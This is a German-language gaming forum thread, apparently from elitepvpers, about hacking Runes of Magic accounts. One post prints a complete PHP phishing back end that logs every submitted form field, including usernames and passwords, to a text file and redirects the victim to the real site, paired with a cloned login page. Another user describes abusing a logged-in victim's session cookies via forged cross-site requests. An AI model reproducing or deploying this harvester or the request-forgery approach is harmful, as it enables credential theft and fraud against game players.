Register for your free account! | Forgot your password?

You last visited: Today at 23:52

  • Please register to post and access all features, it's quick, easy and FREE!

 

ROM Account hacken

Reply
 
Old   #16
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by Fir3andIc3 View Post
Du fragst also den Server nach einem Benutzername und er gibt dir das PW??
Nein, Ich gebe alle Informationen an, so wie ich sie haben möchte.

Es wird ledeglich das Cookie von jemand gebraucht was bei Browsern automatisch zugeordnet wird bei einem Request.



Atheuz is offline  
Old   #17
 
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
aber die cookies werden doch auf dem rechner , des jeweiligen gespeichert und nicht auf dem browser , oder nicht?


wolleboiii is offline  
Old   #18
 
elite*gold: 6
Join Date: Dec 2007
Posts: 255
Received Thanks: 205
Das ist doch ein einfacher Phishing-Versuch. Nichts spezielles mit Cookies abfangen oder so

Hier der Inhalt der post.php
PHP Code:
<?php
header 
('Location: http://www.runesofmagic.com');
$handle fopen("usernames.txt""a");
foreach(
$_POST as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>
Der Quelltext der Runes of Magic Seite dient doch nur als Layout-Template um das Opfer glauben zu lassen es handele sich dabei um die echte Runes of Magic Seite.

Der ganze Spaß bzw. die Texteingaben wie Benutzername und Passwort werden über die globale Variable $_POST abgefangen und in die Datei usernames.txt geschrieben. Fertig.

Das Opfer brauch dabei doch nur den Link der "offiziellen Runes of Magic Seite" (Phishing-Page) bekommen und seine Eingaben machen.
Digital Shadow is offline  
Thanks
1 User
Old   #19
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by wolleboiii View Post
aber die cookies werden doch auf dem rechner , des jeweiligen gespeichert und nicht auf dem browser , oder nicht?
Erm ja, deswegen hab ich ja gesagt, dass das Opfer im Accountsystem von Yusho eingeloggt sein muss, bzw hat sich morgens kurz eingeloggt um Dias zu kaufen. Das Fenster muss auch nicht offen sein, solange er den Browser in dieser Zeit nicht neustartet, dann wäre er anfällig für sowas da der Frogster Server keinen Unterschied macht ob ein Request von runesofmagic.com kommt oder von elitepvpers.com oder sonst wo.


Atheuz is offline  
Old   #20
 
elite*gold: 0
Join Date: Dec 2007
Posts: 501
Received Thanks: 61
Quote:
Originally Posted by Atheuz View Post
Nein, Ich gebe alle Informationen an, so wie ich sie haben möchte.

Es wird ledeglich das Cookie von jemand gebraucht was bei Browsern automatisch zugeordnet wird bei einem Request.

Also das ergibt für mich absolut keinen Sinn! Ich brauche doch nen Cookie von einem "Opfer" und nicht meinen eignen mit den Daten welche ich mir ausgedacht habe öÖ
Fir3andIc3 is offline  
Old   #21
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by Fir3andIc3 View Post
Also das ergibt für mich absolut keinen Sinn! Ich brauche doch nen Cookie von einem "Opfer" und nicht meinen eignen mit den Daten welche ich mir ausgedacht habe öÖ
Gib mir einfach deine MSN damit wir den Spuk von Unwissenheit hier mal endlich lüften können.
Atheuz is offline  
Old   #22
 
elite*gold: 0
Join Date: Dec 2007
Posts: 501
Received Thanks: 61
Quote:
Originally Posted by Atheuz View Post
Erm ja, deswegen hab ich ja gesagt, dass das Opfer im Accountsystem von Yusho eingeloggt sein muss, bzw hat sich morgens kurz eingeloggt um Dias zu kaufen. Das Fenster muss auch nicht offen sein, solange er den Browser in dieser Zeit nicht neustartet, dann wäre er anfällig für sowas da der Frogster Server keinen Unterschied macht ob ein Request von runesofmagic.com kommt oder von elitepvpers.com oder sonst wo.
LOl? Ich denke schon das die IP des Servers Richtig eingetragen ist Der Server muß doch irgenwei wissen welcher account dias bestellt hat und diesem dann Dias zuordnen! Das geht wohl schlecht mit einem Fake Server.

Quote:
Originally Posted by Atheuz View Post
Gib mir einfach deine MSN damit wir den Spuk von Unwissenheit hier mal endlich lüften können.
Brauche ich nicht da ich mir zu 1000% sicher bin, dass es nichts anderes als PHISHING ist Wie Shadow schon sagte. Das geht aber nur wenn der Server von Yasho Daten an einen Anderen Server sendet. Un das geht nur in der Server/Domain einstellung selbst und nicht über Cookies....
Fir3andIc3 is offline  
Old   #23
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by Fir3andIc3 View Post
LOl? Ich denke schon das die IP des Servers Richtig eingetragen ist Der Server muß doch irgenwei wissen welcher account dias bestellt hat und diesem dann Dias zuordnen! Das geht wohl schlecht mit einem Fake Server.
Wie oft noch, -das ist kein fakeserver- oder sonst was. Es wird ledeglich ein Request verschickt, der Browser ordnet das selber zu. Ich biete hier dir ein Beweis an und du trollst einfach weiter
Atheuz is offline  
Old   #24
 
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
ich glaube Atheuz meint das man sich quasi den cookie schicken lässt.
man erstellt per ( html?! .. ka) eine webanfrage inklusive cookie anforderung? könnte ich mir jedenfalls so vorstellen.. nur da kommt mir dann die nächste frage, wie man eine solche erstellt
wolleboiii is offline  
Old   #25
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by wolleboiii View Post
ich glaube Atheuz meint das man sich quasi den cookie schicken lässt.
man erstellt per ( html?! .. ka) eine webanfrage inklusive cookie anforderung? könnte ich mir jedenfalls so vorstellen.. nur da kommt mir dann die nächste frage, wie man eine solche erstellt
Gibt mir einfach von irgendjemand eine MSN, damit ichs beweisen kann -.-
Atheuz is offline  
Old   #26
 
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2


ist aber nicht meine... oder brauchst du eine von uns?
wolleboiii is offline  
Old   #27
 
elite*gold: 0
Join Date: Dec 2007
Posts: 501
Received Thanks: 61
Quote:
Originally Posted by wolleboiii View Post
ich glaube Atheuz meint das man sich quasi den cookie schicken lässt.
man erstellt per ( html?! .. ka) eine webanfrage inklusive cookie anforderung? könnte ich mir jedenfalls so vorstellen.. nur da kommt mir dann die nächste frage, wie man eine solche erstellt
Sobald du versuchst dich irgenwo einzuloggen erstellst du automatisch einen cookie. Da kannst du genau so gut ne bruteforce starten und warten.

Wenn so geht wie er sagt, dann soll er mir bitte mal ein paar funktionierend daten senden und ich versuche mich da mal einzuloggen.. von mir aus meine ^^
Fir3andIc3 is offline  
Old   #28
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by wolleboiii View Post


ist aber nicht meine... oder brauchst du eine von uns?
Kewl trolls, ich brauch schon eine von euch damit man auch sich mit euch unterhalten kann. Das ist ja auch der Sinn dabei und nicht das ich euch jetzt Accounts hacke, ihr versteht das nichtmal.
Atheuz is offline  
Old   #29
 
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
relaxe atheuz...

hast ne pm
wolleboiii is offline  
Old   #30
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by Fir3andIc3 View Post
Brauche ich nicht da ich mir zu 1000% sicher bin, dass es nichts anderes als PHISHING ist Wie Shadow schon sagte. Das geht aber nur wenn der Server von Yasho Daten an einen Anderen Server sendet. Un das geht nur in der Server/Domain einstellung selbst und nicht über Cookies....
Leider warst du dir nicht zu 1001% sicher, hatte es wolleboii auch nun genauer erklärt wieso das überhaupt geht.


Wo bleibt mein obligatorischer Kuchen?


Atheuz is offline  
Reply



« Previous Thread | Next Thread »

Similar Threads
Account hacken?
Hi, ich wollte ma fragn ob ma nen Account hacken kann mit irgend nem Programm, wenn man den Benutzernamen weis (damit das Ding das PW hackt). Geht...
5 Replies - Last Chaos
account hacken
hab ne frage vor kurzem hat mein freund mir ziemlich viele sachen von meinem acc geklaut weil er mein pw wusste.ich will mir die sachen jetzt auch...
8 Replies - Metin2 Main - Discussions / Questions
account hacken
Hi hab eben auf einer hacker seite gelesen das die eine sicherheitslücke gefunden haben womit man blizzards automailer austrickst um an die account...
11 Replies - WoW Main - Discussions / Questions
account hacken?
Wie kann ich na eigentlicj ne Account hacken??? Hab gute Gründe! Wäre nice wenn mir da jemand was sagen kann. Schon mal danke.
19 Replies - Cabal Main - Discussions / Questions
Account hacken
Hi, Wie einfach ist es eigentlich nen Account zu hacken/cleanen ? Wurde neulich angeschrieben kp warum das ich bald gehackt werd... ich glaub da...
11 Replies - Kal Online



All times are GMT +1. The time now is 23:52.


Powered by vBulletin®
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Abuse
Copyright ©2017 elitepvpers All Rights Reserved.